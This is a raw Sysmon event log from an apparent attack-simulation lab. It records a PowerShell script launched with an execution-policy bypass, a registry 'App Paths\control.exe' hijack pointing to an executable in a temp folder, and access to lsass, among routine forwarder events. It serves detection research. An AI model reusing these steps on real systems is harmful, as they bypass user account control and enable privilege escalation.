10341000x80000000000000001054939Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.443{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054938Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.425{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 
(rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Temp\test\sd1.ps1'"C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001054937Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.259{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F100E4E41237904D5A5BEE554249AC3B,SHA256=F2578529C213C162B30578EE7389FAFF9D527C60679D09AABF479AFF77C9BCE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810556Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:31.108{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25D0619AADAF177D316A6145D4091A3A,SHA256=563A50CD3F22529E40AF75DED09941971D98779F7488B74F3029D53CB7E47EBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810557Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:32.124{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B94E56AFCBF9C082F9D096BFB4BE541,SHA256=1158CDE01F034CE2A9B27F1FFAE3D67FB252E88867E5406DA034D7568536FA89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054990Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:32.978{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=858338C7B0D0AFC33469E234A714C209,SHA256=5D3B99B437C843E1F231C54B418AC26206783BA960D5561455E5AFFE11A5045F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054989Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:32.762{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=13E395662AC38D5F2BBFF4052E6F5637,SHA256=873B58CF9BFF2A380641A50CD4C1F3B0A4700F6606E382B6319D4D27BB41BF5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054988Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:32.762{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4970114B99FD66564051BEABA33EE6A8,SHA256=5CE39BEA06945CDE6AF61DB4E6D0517EEF0C1BE0EBA52DCCF3ABEFD46F95A71D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054987Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:32.762{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=443455A1FE8714A8B6E8B566F65C919C,SHA256=8ADBEAD7C097D14CF9F87772FA020E2DC44E3097B49B532AE4D06EC85BA04951,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001054986Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:32.425{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe\(Default)c:\temp\procexp64.exe 354300x80000000000000001054985Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:24.663{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61979-false10.0.1.12-8000- 12241200x80000000000000001054984Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteKey2021-07-12 08:08:32.294{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe 10341000x80000000000000001054983Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:32.094{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054982Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:32.094{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
17141700x80000000000000001054981Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:08:32.063{466BC892-F87F-60EB-FE7D-00000000CF01}9608\PSHost.132705509114250550.9608.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001054980Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:32.025{466BC892-F87F-60EB-FE7D-00000000CF01}9608ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_1o0z1sww.qdu.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054979Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:32.025{466BC892-F87F-60EB-FE7D-00000000CF01}9608ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_1zanxhxy.tey.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001054978Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:32.009{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_1zanxhxy.tey.ps12021-07-12 08:08:32.009 23542300x80000000000000001054991Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:33.309{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87AE3F59A5EBB6002D6B123CDC7DB023,SHA256=B2DB67F7266D0C0F2C110CDDF1A53606F691026B5B10403D20E0C33A7068393E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810559Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:33.124{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20E6C995CFBE582EAAC7DFCA49DE9E59,SHA256=82697E56AADF65EF7891885B194845F4C222A9AA390EED7965A420A1F1E47815,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810558Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:31.257{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57473-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001054992Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:34.310{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B3E3F22E835F7AB8AD008A7E4CF8AB1,SHA256=0FA1FE2B8852B2DDF8D53DC09C07E7F45CAA45E255F62D8B26F5D4F2D004EF61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810560Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:34.140{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03551365F0A55AEDBCB49F4B31883031,SHA256=EFF9D1BF123073EB0D69070D8E2D46510269BF17EF5ECA9635335DAB574B9ABC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054994Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:35.578{466BC892-F87F-60EB-FE7D-00000000CF01}9608ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054993Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:35.325{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F86AF75CB6C0872043B2A563F97D669,SHA256=A854B87F2C9943F9A3FA801C8721E1C9AFDD8B10A7A260C687BF82AF37D583A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810561Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:35.141{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D373B131CE2C7B002EAC976FF157F3BD,SHA256=A94C486D76E45DD71D5E18D60A5D87D6730343530E2BCC0F86FB7947BF71C0FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054996Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:36.578{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D6047E3404738FE08DEEDC471FA0F664,SHA256=0E5967669C287052374BC9CE5E43D903776E13BC9D7D0828440E56252A20C239,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054995Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:36.343{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7354D9E3FA5A6C5FBB89AC13614C0AAA,SHA256=E9B53064937026AC091FD0513D659B6F5AFFA8CC515DB9BBA93A5EB21809FB06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810562Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:36.157{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6827309D1EE6C5DB28CB562710FB0F68,SHA256=94A6E9EBBCE4E902D3A3B30F39FB295FE5383E8ECCF75132B291F27C03EB8146,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054997Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:37.377{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78E740B1B7003CA8990155B37F16FB44,SHA256=B70FC94819FAA95644F504FF4BD24EF2733C8DDBC2588D1E425661B4C2F1315F,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810563Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:37.157{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E88A04D750C5FEB5C7A2363582C631E,SHA256=728B0A785E7BC06847834ECB6FEC423A60CE0BD9F62E0AA129A21D11723A8783,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055000Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:38.694{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=5C7229B62E750B3D461864B87788A26D,SHA256=19ABB45DC44306312744A7CC1BA0D5C3F3E0917DBEC50046673A1B7FE263E246,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054999Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:30.619{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61980-false10.0.1.12-8000- 23542300x80000000000000001054998Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:38.378{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1498E9E78A9F1E57ECD9A8728D7D53E2,SHA256=333CD6846F1A30960BC1FBC1B441AFF0BC217ECC50BA0DE10C53E97A2D4A48A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810564Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:38.173{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6069D50FE57BD4B74AF34B59769CC7C0,SHA256=A37D1B3E29CD20BB6C76E8407CF75E9A7710B09505B30AC4C9BEF2BD420677DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055001Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:39.408{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95C41AC6BA0B3F2CE9A28860EE4D38F1,SHA256=AF787A1208EF0A422DFAFEB15C604097DD06D76C9C95C52C4014B275A544FFA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810566Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:39.173{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A4F4F4B935DD16C1FE8C509CF27F855,SHA256=65070269A66ABB15FA1D1043AB1D337EBA0E24BC627713C5EC83CA7F4FDDF50D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810565Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:37.212{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57474-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001055002Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:40.409{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C49DF08186F9AC31D2F2B9175B0C6977,SHA256=7D99406A4EED91B312C0335B7A23C9D44BD5C591CB07356FD8DBE1501D3F54A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810567Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:40.188{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1ACD589FE695FF4EF88E1B5F47680C51,SHA256=E6E887DB20719D71CE46037E738358D944CC44B4A836F6CAC99111B67438AD66,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055017Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.492{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055016Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:41.492{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055015Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.492{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055014Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.423{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F797976B4C77BAEC28AB6F5D2660DCE,SHA256=71A614A2A42C06EE920396134EF2BB0C9D818EDD9A4DD546833D55E67CA3CE44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810568Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:41.204{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2701A6AEF3FF003363F2A4F2FCF9F66,SHA256=0601698F85C27572E7106C6A0E849717700A8C762612E099E39905BD7DC75C9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055013Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.177{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 